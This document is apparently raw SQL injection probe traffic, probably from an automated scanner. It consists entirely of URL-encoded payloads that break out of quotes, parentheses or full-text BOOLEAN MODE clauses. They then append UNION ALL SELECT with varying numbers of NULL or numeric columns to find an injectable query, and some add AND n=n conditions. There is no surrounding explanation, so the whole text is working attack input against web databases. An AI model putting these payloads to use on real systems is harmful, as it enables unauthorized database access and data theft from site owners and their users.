1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -7478%29%20UNION%20ALL%20SELECT%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822--%20 -8037%29%20UNION%20ALL%20SELECT%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996%2C%202996--%20 -2244%29%20UNION%20ALL%20SELECT%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561--%20 -1043%29%20UNION%20ALL%20SELECT%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750%2C%207750--%20 -2345%29%20UNION%20ALL%20SELECT%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343--%20 -6917%29%20UNION%20ALL%20SELECT%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870%2C%204870--%20 -6378%29%20UNION%20ALL%20SELECT%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383%2C%206383--%20 -1259%29%20UNION%20ALL%20SELECT%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768--%20 -5096%29%20UNION%20ALL%20SELECT%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336--%20 -2470%29%20UNION%20ALL%20SELECT%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705%2C%206705--%20 -3533%27%29%20UNION%20ALL%20SELECT%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734%2C%201734--%20 -8788%27%29%20UNION%20ALL%20SELECT%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305--%20 -7494%27%29%20UNION%20ALL%20SELECT%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588%2C%208588--%20 -9120%27%29%20UNION%20ALL%20SELECT%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051--%20 -4534%27%29%20UNION%20ALL%20SELECT%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214--%20 -1854%27%29%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074--%20 -6148%27%29%20UNION%20ALL%20SELECT%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790--%20 -4397%27%29%20UNION%20ALL%20SELECT%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178%2C%209178--%20 -3225%27%29%20UNION%20ALL%20SELECT%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961--%20 -5107%27%29%20UNION%20ALL%20SELECT%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713--%20 -5992%27%20UNION%20ALL%20SELECT%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126--%20 -2871%27%20UNION%20ALL%20SELECT%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122--%20 -8516%27%20UNION%20ALL%20SELECT%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180%2C%206180--%20 -3488%27%20UNION%20ALL%20SELECT%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094--%20 -2351%27%20UNION%20ALL%20SELECT%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699--%20 -2734%27%20UNION%20ALL%20SELECT%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637%2C%208637--%20 -7525%27%20UNION%20ALL%20SELECT%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229--%20 -5694%27%20UNION%20ALL%20SELECT%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696%2C%209696--%20 -9136%27%20UNION%20ALL%20SELECT%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769%2C%202769--%20 -7335%27%20UNION%20ALL%20SELECT%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248--%20 -4330%22%20UNION%20ALL%20SELECT%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004%2C%205004--%20 -4199%22%20UNION%20ALL%20SELECT%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286%2C%206286--%20 -6439%22%20UNION%20ALL%20SELECT%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544%2C%206544--%20 -9664%22%20UNION%20ALL%20SELECT%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916%2C%204916--%20 -3399%22%20UNION%20ALL%20SELECT%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784%2C%207784--%20 -5226%22%20UNION%20ALL%20SELECT%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668--%20 -6894%22%20UNION%20ALL%20SELECT%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260--%20 -1395%22%20UNION%20ALL%20SELECT%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602%2C%208602--%20 -9119%22%20UNION%20ALL%20SELECT%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847%2C%204847--%20 -2751%22%20UNION%20ALL%20SELECT%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883--%20 -4240%29%20UNION%20ALL%20SELECT%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909%2C%204909--%20%20AND%20%288086%3D8086 -7079%29%20UNION%20ALL%20SELECT%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288--%20%20AND%20%283301%3D3301 -2895%29%20UNION%20ALL%20SELECT%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606--%20%20AND%20%284397%3D4397 -6925%29%20UNION%20ALL%20SELECT%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116--%20%20AND%20%284749%3D4749 -4800%29%20UNION%20ALL%20SELECT%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277%2C%204277--%20%20AND%20%288940%3D8940 -3053%29%20UNION%20ALL%20SELECT%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797--%20%20AND%20%284909%3D4909 -6353%29%20UNION%20ALL%20SELECT%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196--%20%20AND%20%288623%3D8623 